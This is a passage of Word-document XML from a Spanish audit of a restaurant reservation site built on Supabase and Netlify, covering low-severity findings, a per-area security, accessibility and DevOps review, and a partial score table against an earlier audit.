        <w:t xml:space="preserve">Control compensatorio ya existente: Supabase Auth de este proyecto no tiene alta pública activada, así que en la práctica solo existe el usuario admin. Recomendación: confirmarlo explícitamente en Authentication → Settings → "Allow new users to sign up" = OFF, y documentarlo. Si en el futuro se necesitan varios usuarios con distintos permisos, migrar las políticas a un claim de rol (auth.jwt() -&gt;&gt; 'role' = 'admin') en vez de "cualquier autenticado".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V-05 · SEO apuntando al dominio antiguo (Informativo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">canonical, hreflang, Open Graph, Twitter Cards, sitemap.xml y robots.txt están todos correctamente construidos, pero deliberadamente siguen apuntando a mesoncafeteriadeeiffel.es — la política acordada es no tocar ningún enlace funcional a ese dominio hasta que el cambio esté confirmado. No es una acción para esta auditoría, solo queda registrado para no perderlo de vista el día de la migración.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">V-06 · Headers duplicados (Bajo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">netlify.toml y Messon_Eiffel/_headers repiten las mismas cabeceras (el segundo es necesario para deploys manuales sin build). Riesgo bajo de desincronización; opcional añadir un test que compare ambos archivos byte a byte en CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cobertura por área (equipo multidisciplinar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Seguridad (OWASP/CWE/SANS/NIST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sin SQL/NoSQL injection (PostgREST parametriza, sin queries dinámicas). Sin XSS almacenado ni reflejado en HTML servido (escHtml() consistente en admin.js; textContent en gestionar.js/reservas.js). Único hallazgo real: inyección HTML en el canal de email (V-01), fuera del propio sitio web. Sin CSRF relevante (no hay sesiones de cookie que mutar vía formularios cross-site; Supabase Auth usa Bearer tokens). Sin SSRF/RCE/LFI/RFI/XXE/Path Traversal: no hay endpoints que acepten URLs, rutas de archivo ni XML de usuario. Sin Open Redirect (no hay redirecciones basadas en parámetros de usuario). CORS: gestionado por Supabase (anon key + RLS), no hay servidor propio con configuración CORS custom. Clickjacking cubierto dos veces (X-Frame-Options DENY + frame-ancestors 'none'). MIME sniffing bloqueado (X-Content-Type-Options). Sin sesiones de servidor propias (Supabase Auth gestiona JWT/cookies); panel admin sin gestión de contraseñas propia (delegada a Supabase Auth). Sin file upload en ningún formulario. Sin directory listing (Netlify no lo permite por defecto y no hay endpoints que lo expongan). Variables de entorno y claves API: la única clave en el cliente es la anon key de Supabase, diseñada para ser pública y protegida por RLS — correcto. Secretos reales (Resend, WEBHOOK_SECRET, CRON_SECRET, service role key) solo viven como variables de entorno de servidor en Supabase, nunca en el repo ni en el bundle servido. TLS/HTTPS/HSTS: gestionados automáticamente por Netlify (Let's Encrypt) + cabecera HSTS de un año con includeSubDomains. Dependencias: cero dependencias de producción en npm (sitio estático vanilla); las únicas librerías de test (Playwright, http-server) son devDependencies que nunca se despliegan; supabase-js autoalojado en versión fija 2.106.2, sin CDN de terceros en el bundle público.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTML semántico correcto (landmarks, un único h1 por página, main/nav/footer), formularios con label asociada a cada campo, meta tags completos. CSS sin duplicidades relevantes, responsive con media queries coherentes, prefers-reduced-motion respetado globalmente. JavaScript vanilla sin frameworks: sin memory leaks detectados (listeners no acumulados en re-renders del calendario gracias a los tokens anti-carrera ya introducidos en la auditoría anterior), fetch/await bien manejados con captura de error en todas las llamadas a Supabase revisadas, sin promesas sin resolver ni sin catch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Backend (Supabase) y base de datos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arquitectura basada en RPCs SECURITY DEFINER + RLS, sin backend propio que mantener — reduce superficie de ataque de forma significativa. Índices presentes en las columnas de consulta frecuente (fecha, estado, created_at, ip_hash). Integridad reforzada con CHECKs (personas 1-80, longitudes de texto, estado/idioma enumerados). Triggers con advisory lock para evitar condiciones de carrera en la última mesa disponible. Sin backups explícitos configurados en el repo (Supabase gestiona backups automáticos según el plan contratado — verificar fuera del código qué plan está activo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rendimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuentes y supabase-js autoalojados (sin latencia de CDN externo, mejor privacidad), preload del recurso LCP, imágenes con dimensiones explícitas y lazy loading donde corresponde, caché HTTP diferenciada por tipo de asset. Pendiente ya identificado en la auditoría anterior y aún vigente: las fotos de fondo siguen siendo placeholders de Unsplash (recurso externo) hasta que existan fotos reales del local — es el mayor margen de mejora de LCP restante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SEO técnico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">robots.txt, sitemap.xml con hreflang por URL, canonical, Open Graph, Twitter Cards y JSON-LD presentes y coherentes entre los tres idiomas. Todo correcto salvo que aún apunta al dominio pendiente de migrar (V-05, ya contextualizado).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accesibilidad (WCAG 2.2 AA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Skip-link y landmark main en las seis páginas públicas, aria-current en navegación, aria-pressed/aria-label completos en calendario y horas, aria-sort dinámico en la tabla admin, todas las imágenes con alt, formularios con label explícita (incluida la página nueva de autogestión, que reutiliza los mismos patrones ya auditados). No se han encontrado regresiones de accesibilidad en las páginas añadidas desde la última auditoría.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UX/UI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consistencia visual y de interacción mantenida en las páginas y flujos nuevos (autogestión replica el lenguaje visual de reservas.html). Estados de carga, error y confirmación cubiertos en el flujo de autogestión (cargando → error/detalle/cancelada, con mensajes específicos por código de error del backend).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pruebas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Playwright cubre el wizard completo de reservas y el flujo del panel admin (login, alta, stats, orden), siempre contra modo demo en CI. No hay tests E2E todavía para las funcionalidades incorporadas entre el 19 y el 21 de julio: autogestión (gestionar.html), precios editables, cierres temporales y horarios/aforo editables desde el admin. Recomendado antes de dar el proyecto por cerrado, no bloqueante para producción.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sin Docker/Kubernetes (no aplica, sitio estático). CI en GitHub Actions ejecuta los E2E en cada push/PR a main. netlify.toml retira docs/ y supabase/ de la copia publicada y solo regenera config.js si las variables de entorno están definidas (evita machacar un config.js válido en deploys manuales). Sin monitoring/alerting configurado en el repo — a valorar un uptime check externo (gratuito) una vez el sitio esté en producción real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Puntuación por área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06"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="3000"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Área</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nota /100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="5C3317" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Variación vs. auditoría 10-jul</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Arquitectura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">88</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Calidad del código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-1 (SQLERRM sin filtrar)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Seguridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">76</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-12 (inyección HTML en emails, V-01/V-02)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Rendimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">UX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">93</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SEO técnico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">= (pendiente migración de dominio, ya conocido)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Accesibilidad (WCAG 2.2 AA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">92</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">81</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1A110A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">+1 (arquitectura de tokens SECURITY DEFINER)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4906"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
